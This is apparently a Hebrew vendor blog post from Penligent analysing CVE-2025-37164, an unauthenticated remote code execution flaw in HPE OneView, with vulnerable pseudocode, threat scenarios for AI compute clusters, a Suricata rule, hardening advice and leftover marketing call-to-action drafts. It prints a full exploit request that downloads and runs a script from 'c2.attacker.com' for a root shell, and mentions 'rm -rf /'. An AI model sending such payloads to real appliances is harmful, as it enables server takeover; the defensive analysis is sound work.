כותרת Penligent

השתלטות הסיליקון: נתיחה של CVE-2025-37164 (HPE OneView) וקריסת אבטחת המחשוב של הבינה המלאכותית

בעידן הפורח של 2026, שבו "מחשוב הוא הנפט החדש", אבטחת מרכז הנתונים הפיזי מעולם לא הייתה קריטית יותר. בעוד צוותי Red Teams משקיעים שבועות ביצירת הזרקות מהירות כדי לעקוף את מעקות הבטיחות של LLM, איום פרימיטיבי והרסני הרבה יותר צץ ממרתפי מערך ה-IT.

ב-16 בדצמבר 2025, עולם האבטחה זעזע מהחשיפה של CVE-2025-37164, פגיעות ב HPE OneView נושא את הנדיר והמפחיד ציון CVSS של 10.0.

למי שלא מכיר, HPE OneView היא תוכנת "God Mode" לתשתית מודרנית המוגדרת על ידי תוכנה (SDI). היא מאפשרת אוטומציה של הקצאת אלפי שרתים מסוג HPE Synergy ו-ProLiant – המפלצות החומריות שמניעות את אשכולות האימון המתקדמים ביותר בעולם בתחום הבינה המלאכותית.

CVE-2025-37164 הוא ביצוע קוד מרחוק לא מאומת (RCE) פגיעות. היא מאפשרת לכל תוקף עם גישה לרשת ליציאת הניהול לבצע פקודות מערכת שרירותיות כמשתמש root, ובכך למעשה למסור את המפתחות לכל הצי הפיזי. מאמר זה מוותר על הסיכום הכללי כדי לבצע ניתוח מדויק של כשל ה-API והשלכותיו על הנדסת אבטחת AI.

השתלטות הסיליקון: נתיחה של CVE-2025-37164 (HPE OneView) וקריסת אבטחת המחשוב של הבינה המלאכותית

הארכיטקטורה של פגיעות "מצב אלוהים"

כדי להבין את חומרת הפגם הזה, יש להבין את תפקידו של OneView. הוא ממוקם מעל ממשקי BMC (Baseboard Management Controller) ו-iLO (Integrated Lights-Out) ומאגד את השליטה על מחשוב, אחסון ורשתות.

הפגיעות נמצאת בנקודת קצה ספציפית של ממשק REST API: /rest/id-pools/executeCommand.

1. אסון התצורה

בעיצוב API מאובטח, נקודות קצה המסוגלות לבצע פקודות מערכת צריכות להיות מוגנות על ידי מספר שכבות: אימות (OAuth/Session), הרשאה (RBAC) וטיהור קלט.

בגרסאות OneView המושפעות (לפני 11.0), הגדרת נקודת הקצה עבור executeCommand סבל משגיאת תצורה קטסטרופלית. מפת מסנן האבטחה הפנימית סימנה מסלול זה עם סוג אימות: NO_AUTH.

לוגיקה היפותטית של ה-Backend (פסיודוקוד Java/Spring):

Java

```@RestController @RequestMapping("/rest/id-pools") public class IdPoolController {

// פגם קטלני: חסר @PreAuthorize("isAuthenticated()") // נקודת קצה זו כנראה נועדה לתקשורת פנימית בין שירותים // אך נחשפה לממשק הציבורי.
@PutMapping("/executeCommand") public ResponseEntity execute(@RequestBody CommandRequest payload) { String binary = payload.getCommand(); String[] args = payload.getArgs();
    
    // פגם קטלני: הזרקה ישירה ל-ProcessBuilder ללא טיהור ProcessBuilder pb = new ProcessBuilder(binary); pb.command().addAll(Arrays.asList(args)); Process process = pb.start(); return ResponseEntity.ok(readOutput(process)); }

}`

לוגיקה זו יוצרת מנהרה ישירה מבקשת HTTP אל ליבת לינוקס של המכשיר.

השתלטות הסיליקון: נתיחה של CVE-2025-37164 (HPE OneView) וקריסת אבטחת המחשוב של הבינה המלאכותית

2. פירוק שרשרת ההרג

מורכבות הניצול היא נמוך. אין פגיעה בזיכרון שצריך לטפל בה, אין ASLR שצריך לעקוף ואין תנאי מירוץ שצריך לנצח. זהו פגם לוגי פשוט וטהור.

הפרימיטיב Exploit:

התוקף שולח בקשת PUT. המטען הוא אובייקט JSON המגדיר את הפקודה שיש להפעיל.

HTTP

PUT /rest/id-pools/executeCommand HTTP/1.1 Host: oneview-appliance.local Content-Type: application/json

{ "command": "/bin/sh", "args": ["-c", "wget http://c2.attacker.com/payload.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x”] }`

התוצאה:

המכשיר מבצע את הסקריפט. התוקף מקבל מעטפת הפוכה עם הרשאות root. מכאן, יש לו עמידות בבקר הרשת עצמו.

איומי התשתית של הבינה המלאכותית

מדוע זה ספציפי ל"מהנדס אבטחת AI קיצוני"? מכיוון שתשתית AI פגיעה באופן ייחודי לסוג זה של התקפות.

1. שוד ה-GPU (כריית מטבעות קריפטוגרפיים וגניבה)

אשכולות אימון AI משתמשים במעבדי GPU H100/B200, שהם בעלי ערך רב. תוקף עם גישה ל-root ל-OneView יכול:

  • אספקת עומסי עבודה סוררים: הפעל מכונות וירטואליות מוסתרות על חומרה פיזית כדי לכרות מטבעות קריפטוגרפיים, תוך ניצול מגה-ואטים של חשמל וקיבולת קירור.
  • מניעת משאבים: במהלך אימון קריטי (שעשוי לעלות מיליונים), התוקף יכול להוציא כיבוי פקודה לשרתים הפיזיים באמצעות ממשק iLO, מה שגרם לאובדן נתונים קטסטרופלי ולעיכובים בפרויקט.

2. הרעלת שרשרת האספקה באמצעות קושחה

OneView מנהל עדכוני קושחה עבור צי השרתים. תוקף בעל גישה לרוט יכול:

  • קושחת פלאש זדונית: הורדת גרסת ה-BIOS/UEFI לגרסאות פגיעות או השתלת rootkits קבועים (כגון BlackLotus) לפלאש SPI של שרתי ה-AI.
  • גישה מתמשכת: גם אם מערכת ההפעלה נמחקת ומוותקנת מחדש, התוכנה הזדונית נשארת בחומרה, ומסכנת כל דגם עתידי שיוכשר על המחשב הזה.

3. מעבר לרוחב לאגמי נתונים

אשכולות AI בעלי ביצועים גבוהים משולבים באופן הדוק עם מבני אחסון (Infiniband/RoCE). OneView מנהל חיבורים אלה. פגיעה ב-OneView מאפשרת לתוקף לעגן את אמצעי האחסון NAS/SAN הבסיסיים, מה שמקנה לו גישה ישירה למאגרי נתונים קנייניים ולמשקלי מודלים מבלי לגעת ברשת AD הארגונית.

הגנה מבוססת בינה מלאכותית: היתרון של Penligent

איתור נקודות תורפה בתשתית כמו CVE-2025-37164 הוא נקודת תורפה של סורקי יישומים אינטרנטיים מסורתיים (DAST). כלי DAST סורקים HTML; הם כמעט ולא בודקים ממשקי API ניהוליים לא ברורים ביציאות לא סטנדרטיות.

זה המקום שבו Penligent.ai מייצג שינוי פרדיגמטי בתחום אבטחת התשתיות.

1. מיפוי נכסים מחוץ לתחום (OOB)

סוכני ה-AI של Penligent משתמשים ב מיפוי נכסים מלא. הם לא רק סורקים אפליקציות אינטרנט, אלא גם מקשיבים באופן פעיל לחתימות פרוטוקולי ניהול (IPMI, Redfish, HPE REST API). הבינה המלאכותית מקשרת בין חתימות אלה לבין מידע מודיעיני עדכני על איומים, ומזהה את "תשתית הצללים" שה-IT שכח לתקן.

2. אימות RCE לא הרסני

סריקת אשכול AI בייצור היא פעולה מסוכנת. סריקה לא נכונה עלולה לגרום לקריסת השרת. Penligent משתמשת פוזינג רגיש להקשר לבצע אימות לא הרסני.

  • מטען בטוח: במקום לשלוח rm -rf / או מעטפת הפוכה, Penligent שולח מטען תמים כמו הד "Penligent_Check".
  • אימות: ה-AI מנתח את תגובת ה-HTTP. אם הוא מזהה את המחרוזת המהדהדת, הוא מאשר את ה-RCE בוודאות של 100%, מה שמאפשר לצוות האבטחה לתת עדיפות לתיקון מבלי לקרוס את משימת האימון.

מדריך צוות כחול: איתור וחיזוק

אם אינך יכול להתקין את התיקון באופן מיידי, אתה נמצא במצב של "הפרה משוערת".

1. זיהוי רשת (Suricata/Snort)

עקוב אחר התעבורה לרשת המשנה של OneView. חפש HTTP. PUT או POST בקשות ל /rest/id-pools/executeCommand.

כלל Suricata:

YAML

התראה http $EXTERNAL_NET כל -> $ONEVIEW_SERVER 443 (msg:"ניסיון ניצול ET HPE OneView CVE-2025-37164 RCE"; \\ flow:established,to_server; \\ content:"/rest/id-pools/executeCommand"; http_uri; \\ content:"command"; http_client_body; \\ content:"/bin/"; http_client_body; \\ classtype:attempted-admin; sid:1000025; rev:1;)

2. ביקורת יומנים

בדוק את יומני הביקורת של OneView (ci-debug.log או audit.log) עבור שיחות בלתי צפויות ל- IdPools בקר שמקורו בכתובות IP שאינן המארח המוגדר כ-Bastion Host.

3. הסגר אדריכלי

  • VLAN ניהול: ודא שממשק מכשיר OneView נמצא ברשת VLAN מבודדת לחלוטין, הנגישה רק באמצעות VPN עם MFA.
  • ACLs: החל רשימות בקרת גישה ברמת המתג כדי לחסום את כל התעבורה ליציאה 443 במכשיר OneView, למעט מה-IP הספציפי של תחנת העבודה של מנהל המערכת.

סיכום

CVE-2025-37164 מזכיר לנו בצורה אכזרית שה"ענן" הוא בסך הכל המחשב של מישהו אחר, ולמחשב הזה יש יציאת ניהול. בלהט לבנות AGI, אסור לנו להזניח את היסודות המוחשיים שעליהם הוא נשען.

אבטחת העתיד של הבינה המלאכותית תלויה לא רק ביישור מודלים חזק, אלא גם בשלמות שרשרת האספקה של הסיליקון. שדרגו את הקושחה שלכם, בידדו את מישורי הניהול שלכם והשתמשו באימות חכם ואוטומטי כדי להבטיח שהקונסולה שלכם במצב "God Mode" לא תהפוך למגרש משחקים של תוקפים.

הפניות אמינות

🚀 אפשרויות CTA

אפשרות 1 (נקודת תורפה – מומלצת):

האם סורק ה-DAST שלכם אינו מזהה ממשקי API לניהול? Penligent כן מזהה.

הפסיקו להתעלם מהתשתית שלכם. גלו עוד היום RCE מוסתרים באשכול המחשוב של ה-AI שלכם עם Penligent.

אפשרות 2 (דחיפות):

אל תתנו לבאג ב"מצב אלוהים" למחוק את מודלי ה-AI שלכם.

אמתו את רמת האבטחה של HPE OneView באופן מיידי באמצעות בדיקות לא הרסניות של Penligent.

שתף את הפוסט:
פוסטים קשורים
he_ILHebrew